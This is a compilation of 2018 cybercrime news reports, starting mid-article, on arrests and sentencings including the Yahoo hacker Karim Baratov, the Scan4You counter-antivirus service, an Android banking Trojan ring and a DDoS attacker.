"[We] are disappointed the govt has filed this superseding indictment, which is meritless," Klein tweeted. "It only serves to highlight the prosecution's serious flaws. We expect [Hutchins] to be vindicated and then he can return to keeping us all safe from malicious software."
Hutchins, who is living in Los Angeles on bail, has been unable to leave the United States since last year due to his pending criminal charges.
Hutchins stormed to fame and was hailed as a hero earlier last year when he accidentally stopped a global epidemic of the WannaCry ransomware attack that crippled computers all across the world.

Teen Arrested for Hacking Minnesota Government Systems
7.6.2018 securityweek Crime

The United States Department of Justice this week announced the arrest of an individual charged with the hacking of servers owned by the State of Minnesota.

The suspect, Cameron Thomas Crowley, 19, who uses the online handle of Vigilance, made an initial appearance in court on Tuesday, before United States Magistrate Judge Becky R. Thorson in Saint Paul, Minnesota. He remains in federal custody pending his detention hearing.

In addition to announcing Crowley’s arrest, the Department of Justice revealed a five-count indictment that charges the individual with intentional access to a protected computer, intentional damage to a protected computer, and aggravated identity theft.

The indictment alleges that, between May 28, 2017 and June 17, 2017, Crowley intentionally accessed protected servers owned by the State of Minnesota and other entities, without authorization.

In June last year, Vigilance announced on Twitter the hacking of databases belonging to the Minnesota state government and the theft of over a thousand email addresses and corresponding passwords, all of which were dumped online.

The hacker said at the time the action was the result of a jury finding Jeronimo Yanez, a police officer from St. Anthony, Minnesota, not guilty of manslaughter after he shot and killed African-American Philando Castile during a seemingly routine traffic stop in the summer of 2016.

Castile, 32, was shot seven times when he tried to reach for his ID, after he told Yanez he had a gun and a license to carry it. Castile was in the car with his girlfriend and their 4-year-old daughter.

Crowley is also charged with transmitting programs, code, and commands to the compromised servers, causing damage that led to a loss to the State of Minnesota of more than $5,000.

Thus, the alleged hacker is charged with three counts of intentional access to a protected computer and one count of intentional damage to a protected computer. Additionally, the indictment charges Crowley with one count of aggravated identity theft.

The investigation into this case is conducted by the Federal Bureau of Investigation and the Minnesota Bureau of Criminal Apprehension.

Yahoo Hacker linked to Russian Intelligence Gets 5 Years in U.S. Prison
7.6.2018 thehackernews  Crime

A 23-year-old Canadian man, who pleaded guilty last year for his role in helping Russian government spies hack into email accounts of Yahoo users and other services, has been sentenced to five years in prison.
Karim Baratov (a.k.a Karim Taloverov, a.k.a Karim Akehmet Tokbergenov), a Kazakhstan-born Canadian citizen, was also ordered on Tuesday by United States Judge Vince Chhabria to pay a fine of $250,000.
Baratov had previously admitted his role in the 2014 Yahoo data breach that compromised about 500 million Yahoo user accounts. His role was to "hack webmail accounts of individuals of interest to the FSB," Russia's spy agency.
In November, Baratov pleaded guilty to a total of nine counts, including one count of conspiring to violate the Computer Fraud and Abuse Act, and eight counts of aggravated identity theft.
According to the US Justice Department, Baratov and his co-defendant hacker Alexsey Belan worked for two agents—Dmitry Dokuchaev and Igor Sushchin—from the FSB (Federal Security Service) to compromise the accounts.
The Justice Department announced charges for all of the four people in March last year, which resulted in the arrest of Baratov in Toronto at his Ancaster home and then his extradition to the United States.
However, Belan—who is already on the FBI's Most Wanted Hackers list—and both FSB officers currently reside in Russia, so they are unlikely to face the consequences for their involvement.
Baratov ran an illegal no-questions-asked hacking service from 2010 until his arrest in March 2017, charging customers around $100 to obtain another person's webmail password by tricking the victim into entering their credentials into a fake password reset page.
According to the court documents, Baratov managed to crack more than 11,000 email accounts in both Russia as well as the United States before the Toronto Police Department caught him.
As part of his plea, Baratov admitted to hacking thousands of webmail accounts of individuals over seven years and sending those accounts' passwords to Russian spy Dokuchaev in exchange for money.
The targeted attack allowed the four to gain direct access to Yahoo's internal networks, and once in, co-defendant hacker Belan started poking around the network.
According to the FBI, Belan discovered two key assets:
Yahoo's User Database (UDB) – a database containing personal information about all Yahoo users.
The Account Management Tool – an administrative tool used to make alterations to the targeted accounts, including their passwords.
Belan then used the file transfer protocol (FTP) to download Yahoo's UDB, which included password recovery emails and cryptographic values unique to each Yahoo account, eventually enabling Belan and Baratov to access specific accounts of interest to the Russian spies.
According to Baratov's lawyers, at the time of the crime, Baratov had no idea he was working with Russian FSB agents.

Accused Yahoo Hacker Gets Five Years in Prison, Fine
30.5.2018 securityweek Crime

A man accused of taking part in devastating cyberattacks on Yahoo for Russian intelligence agents was sentenced Tuesday to five years in prison in a plea bargain with prosecutors.

The deal struck by 23-year-old Karim Baratov, who immigrated to Canada from Kazakhstan, also resulted in a fine that "encompasses all his remaining assets," the US Justice Department said in a statement.

Baratov has been in American custody since being extradited from Canada last year on a US warrant for hacking, commercial espionage and related crimes.

US authorities allege Russian intelligence agents hired Baratov and another hacker to carry out attacks on Yahoo from 2014 to 2016.

The data breach compromised 500 million Yahoo accounts and is one of the largest cyberattacks in history.

"The sentence imposed reflects the seriousness of hacking for hire," said prosecutor Alex Tse.

"Hackers such as Baratov ply their trade without regard for the criminal objectives of the people who hire and pay them."

Targets included Russian and US government officials, cyber security, diplomatic and military personnel, journalists, companies and financial firms.

"It's difficult to overstate the unprecedented nature of this conspiracy, in which members of a foreign intelligence service directed and empowered criminal hackers to conduct a massive cyber-attack against 500 million victim user accounts," said John Bennett, FBI special agent in charge for the San Francisco field office.

Russian Police Arrest Man Involved in Android Banking Trojan Scheme
25.5.2018 securityweek Crime 

Law enforcement authorities in Russia have arrested an unnamed 32-year-old man who is believed to be part of a cybercrime ring that made up to $8,000 per day using Android banking Trojans.

According to Russia-based cybersecurity firm Group-IB, the suspect is an unemployed Russian national who had previously been convicted for arms trafficking. He was arrested earlier this month and reportedly already confessed.

The cybercrime group used a malicious Android app named “Banks at your fingertips” to trick the customers of Russian banks into handing over their financial information. The banking Trojan was disguised as a tool that claimed to allow users to access all their bank accounts from one Android app. It offered users the possibility to view balances, transfer money between payment cards, and pay for online services.

The malicious app, distributed via spam emails since 2016, instructed users to enter their card details, which were then sent to a server controlled by the attackers. The cybercrooks transferred between $1,500 and $8,000 per day from victims’ bank accounts, $200-$500 at a time. The criminal proceeds were laundered using cryptocurrencies.

The malware also helped the attackers intercept the SMS confirmation codes sent by banks, at the same time blocking all text messages confirming transactions in an effort to avoid raising suspicion.

While Russia has occasionally collaborated with Western law enforcement agencies to bring down global cybercrime operations, it has often turned a blind eye to the activities of hackers who have mainly targeted the United States.

Four Russian nationals are currently on the FBI’s Cyber Most Wanted list, including the alleged administrator of a massive cybercrime scheme involving the Zeus Trojan, and three people believed to have been involved in attacks on Yahoo that resulted in roughly 500 million accounts getting compromised.

The Russian government has defended some of the alleged hackers arrested by the United States – in one case Moscow accused Washington of abducting the son of a lawmaker.

On the other hand, the government has been known to crack down on cybercrime rings that target Russian citizens. Police have arrested 50 hackers believed to have used the Lurk Trojan, the creator of the Svpeng Android malware, and nine people who allegedly stole $17 million from bank accounts.

Judges convict crook of operating Scan4You Counter Antivirus Service
20.5.2018 securityaffairs Crime

Crook faces up to 35 years in prison for operating the popular Scan4You counter anti-virus (CAV) website that helped malware authors test the evasion capabilities of their code.
Scan4You was a service well known to malware developers, who used it as a counter anti-virus (CAV).

Scan4You allowed vxers to check their malware against as many as 40 antivirus solutions.

Scan4You was probably the largest counter anti-virus website. It went offline in May 2017 after authorities arrested two men in Latvia, the Russian nationals Jurijs Martisevs (36) (aka “Garrik”) and Ruslans Bondars (37) (aka “Borland”).

Both suspects were extradited by the FBI to the United States.

Jurijs Martisevs was traveling to Latvia when he was arrested by authorities and in March he pleaded guilty in a Virginia court to charges of conspiracy and aiding and abetting computer intrusion.

On Wednesday, Bondars was found guilty of conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to commit wire fraud, and computer intrusion with intent to cause damage.

“Ruslans Bondars helped hackers test and improve the malware they then used to inflict hundreds of millions of dollars in losses on American companies and consumers,” said John P. Cronan, Acting Assistant Attorney General of the Justice Department’s Criminal Division.

“Today’s verdict should serve as a warning to those who aid and abet criminal hackers: the Criminal Division and our law enforcement partners consider you to be just as culpable as the hackers whose crimes you enable—and we will work tirelessly to identify you, prosecute you, and seek stiff sentences that reflect the seriousness of your crimes.”

Bondars faces a maximum penalty of 35 years in prison when sentenced on September 21, 2018.

Scan4You was launched in 2009 with the intent to offer a service that helped malware developers to check evasion capabilities of their code.

For a monthly fee, malware authors could upload their samples to the service, which tested their evasion capabilities against a broad range of anti-virus products.

The service was similar to the legitimate VirusTotal, except that Scan4You did not share submissions with the security community.

“Scan4you differed from legitimate antivirus scanning services in multiple ways. For example, while legitimate scanning services share data about uploaded files with the antivirus community and notify their users that they will do so, Scan4you instead informed its users that they could upload files anonymously and promised not to share information about the uploaded files with the antivirus community,” the DoJ continues.

According to the DoJ, crooks used Scan4You’s services to test the infamous Citadel malware that was used in the cyber attack against the retail giant Target.

Even though Scan4You has been taken offline, crooks have other ways to test their malware before releasing it in the wild. Law enforcement must remain vigilant to prevent the growth of similar services.

Man Sentenced to 15 Years in Prison for DDoS Attacks, Firearm Charges
19.5.2018 securityweek  Crime

A New Mexico man has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

John Kelsey Gammell, 55, used several so-called booter services to launch cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser. His targets included former employers, business competitors, companies that refused to hire him, colleges, law enforcement agencies, courts, banks, and telecoms firms.

Gammell took measures to avoid exposing his real identity online, including through the use of cryptocurrencies to pay for the DDoS attacks and VPNs. However, a couple of taunting emails he sent to his victims during the DDoS attacks – asking if they had any IT issues he could help with – were sent from Gmail and Yahoo addresses that had been accessed from his home IP address.

The man initially rejected a plea deal and his attorney sought the dismissal of the case, but in January he pleaded guilty to one count of conspiracy to commit intentional damage to a protected computer and two counts of being a felon-in-possession of a firearm. Gammell, a convicted felon, admitted having numerous firearms and hundreds of rounds of ammunition.

In addition to the 180-month prison sentence, Gammell will have to pay restitution to victims of his DDoS attacks, but that amount will be determined at a later date.

A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms
19.5.2018 securityaffairs Crime

A New Mexico man admitted being responsible for DDoS attacks against the websites of former employers, business competitors, and public services.
John Kelsey Gammell, 55, from New Mexico has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

The man used several popular “DDoS-for-hire” (booter) services to power the attacks against his victims, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser.

The list of victims is long and includes business competitors, former employers, law enforcement agencies, courts, banks, telecoms companies, and firms that refused to hire him.

The man used VPN services to hide his identity and cryptocurrency for his payments, but he was identified due to poor operational security (OPSEC). He sent emails to the victims while they were under DDoS attack, offering his services to mitigate the problems. The mails were sent from Gmail and Yahoo accounts he accessed from his home without masking his real IP address.

The man initially rejected a plea deal, but in January he pleaded guilty to committing intentional damage to a protected computer, admitting to launching DDoS attacks on websites in the United States between July 2015 and March 2017. He also pleaded guilty to two counts of being a felon-in-possession of firearms and ammunition.

The man was sentenced to 180 months in prison and will have to compensate the victims of his DDoS attacks; the overall amount will be determined later.